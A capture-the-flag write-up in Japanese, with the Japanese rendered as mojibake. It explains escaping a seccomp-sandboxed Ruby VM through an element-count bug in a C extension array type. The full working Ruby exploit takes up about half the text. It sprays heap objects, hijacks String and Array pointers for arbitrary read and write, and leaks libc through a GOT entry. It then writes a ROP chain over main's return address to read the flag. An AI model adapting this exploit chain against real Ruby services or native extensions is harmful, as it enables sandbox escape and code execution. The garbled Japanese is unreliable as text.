Rubyã®ã‚³ãƒ¼ãƒ‰ã‚’é€ã‚‹ã¨å®Ÿè¡Œã—ã¦ãれるサーãƒãƒ¼ãŒã‚る。
ã—ã‹ã—Rubyã®VMã«ã¯seccompã«ã‚ˆã‚‹sandboxを実装ã—ãŸç‹¬è‡ªãƒ‘ッãƒãŒé©ç”¨ã•ã‚Œã¦ãŠã‚Šã€Ruby上ã§flagã‚’èªã¿è¾¼ã‚“ã りコマンドを実行ã™ã‚‹äº‹ã¯ä¸å¯èƒ½ã«ãªã£ã¦ã„る。
ã¤ã¾ã‚ŠRubyã®VM escapeã‚’è¡Œã£ã¦ãƒ•ãƒ©ã‚°ã‚’èªã¿å‡ºã›ã¨ã„ã†ç‰©ã€‚
サーãƒãƒ¼ä¸Šã®Rubyã§ã¯Cエクステンションã«ã‚ˆã£ã¦å®Ÿè£…ã•ã‚ŒãŸLFAã¨ã„ã†å¯å¤‰é•·é…列ãŒä½¿ãˆã‚‹ãŒã“ã®Cエクステンションã®è„†å¼±æ€§ã‚’利用ã—ã¦VM escapeã™ã‚‹ã€‚
Cエクステンションã§ã‚ã‚‹LFA.soをリãƒãƒ¼ã‚·ãƒ³ã‚°ã™ã‚‹ã¨ã€ä¾‹ãˆã°ä»¥ä¸‹ã®ã‚ˆã†ãªRubyã®ã‚³ãƒ¼ãƒ‰ãŒå®Ÿè¡Œã•ã‚Œã‚‹ã¨
require 'LFA' $arr = LFA.new $arr[0] = 11 $arr[4] = 11 $arr[15000] = 11
LFAã¯å†…部ã§mallocã®binsã®ã‚ˆã†ãªãƒ‡ãƒ¼ã‚¿æ§‹é€ ã‚’2ã¤ç”Ÿæˆã—ã¦ãƒªãƒ³ã‚¯ã™ã‚‹ã€‚
bins[0] -> bins[15000]
å„binsã¯æ±ºã‚られãŸæ•°ã®ãƒãƒ£ãƒ³ã‚¯ã‚’æŒã£ã¦ãŠã‚Šbins->start_idxã‹ã‚‰å§‹ã¾ã‚‹ä¸€å®šå€‹æ•°ã®è¦ç´ ã‚’æ ¼ç´ã—ã¦ã„る。
例ãˆã°arr[4]ã¯bins[0]ã®ãƒãƒ£ãƒ³ã‚¯å†…ã«æ ¼ç´ã•ã‚Œã¦ã„ã‚‹ãŒã€arr[15000]ã¯bins[0]ã«ã¯å…¥ã‚Šåˆ‡ã‚‰ãªã„ãŸã‚ã€
æ–°ãŸã«start_idx = 15000ã®binsを生æˆã—ãã“ã«æ ¼ç´ã™ã‚‹ã€‚
ã¤ã¾ã‚Šãªã‚‹ã¹ãè¿‘ã„æ·»å—ã®è¦ç´ ã‚’ã²ã¨ã¾ã¨ã‚ã«ã—ã¦ã€é›¢æ•£çš„ã«ç®¡ç†ã—ã¦ã„る。
ã•ã¦ã€å•é¡Œã®è„†å¼±æ€§ã¯arr.removeを実行ã—ãŸæ™‚ã«ç™ºç”Ÿã™ã‚‹ã€‚LFAã¯è¦ç´ æ•°ãŒ1ãƒãƒ£ãƒ³ã‚¯ä»¥ä¸‹ã«ãªã£ãŸæ™‚ã€ã‚ャッシュ用ã«ç¢ºä¿ã—ã¦ãŠã„ãŸå›ºå®šé•·ã®é…列内ã«ãƒãƒ£ãƒ³ã‚¯ã‚’移ã—ã¦
リストã§ç®¡ç†ã™ã‚‹äº‹ã‚’ã‚„ã‚る。ã“ã®å‡¦ç†ãŒç™ºç”Ÿã—ãŸæ™‚ã®ã¿ã€LFAã®è¦ç´ 数を表ã™ãƒ¡ãƒ³ãƒã‚’æ›´æ–°ã—ã¦ã„ãªã„ã¨ã„ã†è„†å¼±æ€§ã§ã‚る。
ã¤ã¾ã‚Š
require 'LFA' $ooa_size=0x8000000 $arr[$ooa_size] = 0xdead $arr.remove $ooa_size puts $arr[0x7000000] #OOR $arr[0x7000000]=0xbeef #OOW
一旦$arr[$ooa_size]ã§ã‚µã‚¤ã‚ºã‚’$ooa_sizeã«ã—ãŸçŠ¶æ…‹ã§æ®‹ã‚Š1ãƒãƒ£ãƒ³ã‚¯ã‚’削除ã™ã‚‹ã¨ã€
サイズã¯å¤‰ã‚らãšã€å®Ÿéš›ã¯ã‚ャッシュ用ã®å›ºå®šé•·é…列ã«ã‚¢ã‚¯ã‚»ã‚¹ã—よã†ã¨ã™ã‚‹ã€‚
ã“ã®ã‚ャッシュé…列ã¸ã®ã‚¢ã‚¯ã‚»ã‚¹ã¯$ooa_sizeã¾ã§è¡Œãˆã‚‹ãŸã‚OOR/WãŒç™ºç”Ÿã™ã‚‹ã€‚
Heap Fengshui
ã•ã¦ã€Ruby上ã§å·¨å¤§ãªãƒ’ープã«å¯¾ã™ã‚‹OOR/WãŒè¡Œãˆã‚‹ã¨ãªã‚Œã°æ¬¡ã¯ã©ã†ã™ã‚‹ã‹ã€‚
ã“ã®æ‰‹ã®ãƒ’ープãŒè‡ªç”±ã«èªã¿æ›¸ãã§ãるエクスプãƒã‚¤ãƒˆã§ã¯Heap Fengshuiã¨ã„ã†ãƒ†ã‚¯ãƒ‹ãƒƒã‚¯ãŒåˆ©ç”¨ã—ã‚„ã™ã„。
1å¹´ã»ã©å‰ã®ãƒ—レゼン資料å‚照。
speakerdeck.com
Stringã‚„Arrayã¨ã„ã£ãŸå†…部的ã«ãƒã‚¤ãƒ³ã‚¿ã‚’æŒã£ã¦ã„ã‚‹ãƒ‡ãƒ¼ã‚¿æ§‹é€ ã‚’ãƒ’ãƒ¼ãƒ—ä¸Šã«ç¢ºä¿ã—ã¦ã€å†…部ãƒã‚¤ãƒ³ã‚¿ã‚’書ãæ›ãˆã‚‹äº‹ã§
ä»»æ„ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«èªã¿æ›¸ããŒè¡Œãˆã‚‹ã‚ˆã†ã«ãªã‚‹ã¨ã„ã†ã‚‚ã®ã€‚
今回ã¯Rubyã®String(内部的ã«ã¯RString)ã¨Array(RArray)を悪用ã™ã‚‹ã€‚
struct RBasic { VALUE flags; const VALUE klass; } struct RString { struct RBasic basic; union { struct { long len; char *ptr; union { long capa; VALUE shared; } aux; } heap; char ary[RSTRING_EMBED_LEN_MAX + 1]; } as; }; struct RArray { struct RBasic basic; union { struct { long len; union { long capa; VALUE shared; } aux; const VALUE *ptr; } heap; const VALUE ary[RARRAY_EMBED_LEN_MAX]; } as; };
エクスプãƒã‚¤ãƒˆã®æ‰‹é †ã¯
1. RString/RArrayをヒープ上ã«å¤§é‡ã«ç¢ºä¿(スプレー)
2. LFA.arrを使ã£ã¦ãƒ’ープ上を検索ã—RString/RArrayã‚’ãã‚Œãžã‚Œ1ã¤ãšã¤æŽ¢ã—出ã™(検索ã®ã‚·ã‚°ãƒãƒãƒ£ã«ã¯RBasic.flags, .lenã®å€¤ã‚’使用)
3. RString.ptrを書ãæ›ãˆStringã¨ã—ã¦èªã¿è¾¼ã‚€ã“ã¨ã§AAR
4. RArray.ptrを書ãæ›ãˆArray[0]ã«æ›¸ã込むã“ã¨ã§AAW
5. LFA.arr(RTypedData)ã®typeã®å€¤ã‚’リーク(ã“ã‚Œã¯LFA.so内ã®ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã‚’å‚ç…§)
6. リークã•ã›ãŸã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‹ã‚‰LFA.so内ã®__cxa_finalizeã®GOTアドレスを計算
7. GOTã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‹ã‚‰libcã®ãƒ™ãƒ¼ã‚¹ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’計算 (5. ~ 7. 㯠ASLR+PIE bypassã«å¿…è¦)
8. glibc.__libc_argvã‹ã‚‰&argv[0]ã®å€¤ã‚’リークã€main関数ã®ret addrを載ã›ã¦ã„るスタックã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’計算
9. main関数ã‹ã‚‰ROPã§flagã‚’èªã¿è¾¼ã‚€ (ROPã‚’è¡Œã†ç†ç”±ã¯Full RELRO bypassã®ãŸã‚)
struct RTypedData { struct RBasic basic; const rb_data_type_t *type; VALUE typed_flag; /* 1 or not */ void *data; };
Exploit
require 'LFA' GC.disable $CXA_FINALIZE = 0x43520 $LIBC_ARGV = 0x3f04c0 $ooa_size=0x8000000 $heap_str_idx = 0 $heap_arr_idx = 0 $ooa_str = 0 $ooa_array = 0 $old_str_ptr_l = 0 $old_str_ptr_h = 0 $old_array_ptr_l = 0 $old_array_ptr_h = 0 $arr = LFA.new $arr_addr = $arr.__id__ * 2 $arr[$ooa_size] = 0xdead $arr.remove $ooa_size $shui = Array.new(0x1000) def AARead(addr) $low = addr & 0xffffffff if ($low & 0x80000000) != 0 $low = -((1<<32) - $low) end # RString->ptr $arr[$heap_str_idx + 6] = $low $arr[$heap_str_idx + 7] = (addr >> 32) & 0xffffffff val = $ooa_str[0, 8].unpack("Q*")[0] $arr[$heap_str_idx + 6] = $old_str_ptr_l $arr[$heap_str_idx + 7] = $old_str_ptr_h return val end def AAWrite(addr, val) val = (val - 1) / 2 # RArray []= method $low = addr & 0xffffffff if ($low & 0x80000000) != 0 $low = -((1<<32) - $low) end # RString->ptr $arr[$heap_arr_idx + 8] = $low $arr[$heap_arr_idx + 9] = (addr >> 32) & 0xffffffff $ooa_array[0] = val $arr[$heap_str_idx + 8] = $old_array_ptr_l $arr[$heap_str_idx + 9] = $old_array_ptr_h end i = 0 while i < $shui.length do $shui[i] = String.new('A' * 0x50) $shui[i + 1] = Array.new(0x50) i += 2 end i = 0 # Search Rstring while i < $ooa_size do if $arr[i] == 0x506005 and $arr[i + 1] == 0 and $arr[i + 4] == 0x50 and $arr[i + 5] == 0x0 $arr[i + 4] = 0x80 $heap_str_idx = i puts 'RString offset = ' + $heap_str_idx.to_s() $old_str_ptr_l = $arr[i + 6] $old_str_ptr_h = $arr[i + 7] break end i += 1 end i = 0 while i < $shui.length do if $shui[i].length == 0x80 $ooa_str = $shui[i] break end i += 1 end # Search RArray while i < $ooa_size do if $arr[i] == 0x7 and $arr[i + 1] == 0 and $arr[i + 4] == 0x50 and $arr[i + 5] == 0x0 $arr[i + 4] = 0x90 $heap_arr_idx = i puts 'RArray offset = ' + $heap_arr_idx.to_s() $old_array_ptr_l = $arr[i + 8] $old_array_ptr_h = $arr[i + 9] break end i += 1 end i = 0 while i < $shui.length do if $shui[i].length == 0x90 $ooa_array = $shui[i] break end i += 1 end puts "arr addr = 0x" + $arr_addr.to_s(16) $ooa_array_addr = $ooa_array.__id__ * 2 puts "ooa_array_addr: 0x" + $ooa_array_addr.to_s(16) # LFA(RTypedObject)->type $lfa_type_addr = AARead($arr_addr + 0x10) # GOT of __cxa_finalize $libc_finalize_addr = AARead($lfa_type_addr + 0x238) $libc_base = $libc_finalize_addr - $CXA_FINALIZE $libc_argv = $libc_base + $LIBC_ARGV puts '__cxa_finalize: 0x' + $libc_finalize_addr.to_s(16) puts 'libc base: 0x' + $libc_base.to_s(16) puts 'libc_argv[addr]: 0x' + $libc_argv.to_s(16) # Stack address (main ret) $argv0_stack = AARead($libc_argv) $main_ret = $argv0_stack - 0xe0 puts 'main_ret: 0x' + $main_ret.to_s(16) # Do ROP pop_rax = $libc_base + 0x439c7 xor_rax = $libc_base + 0xb17c5 pop_rdi = $libc_base + 0x2155f pop_rsi = $libc_base + 0x2ffa7 pop_rdx_rbx = $libc_base + 0x16643b syscall_ret = $libc_base + 0xd2975 rop = [xor_rax, pop_rdi, 1023, pop_rsi, $main_ret, pop_rdx_rbx, 0x21, 0xdead, syscall_ret] # # read(1023, buf,0x20) rop += [pop_rax, 1, pop_rdi, 1, pop_rsi, $main_ret, pop_rdx_rbx, 0x21, 0xdead, syscall_ret] # write(1, buf,0x20) i = 0 while i < rop.length do AAWrite($main_ret + i * 8, rop[i]) i += 1 end #gets
ãŠã‚ã‚Šã«
急ã„ã§æ›¸ã„ãŸã®ã§é›‘ãªèª¬æ˜Žã‹ã‚‚。
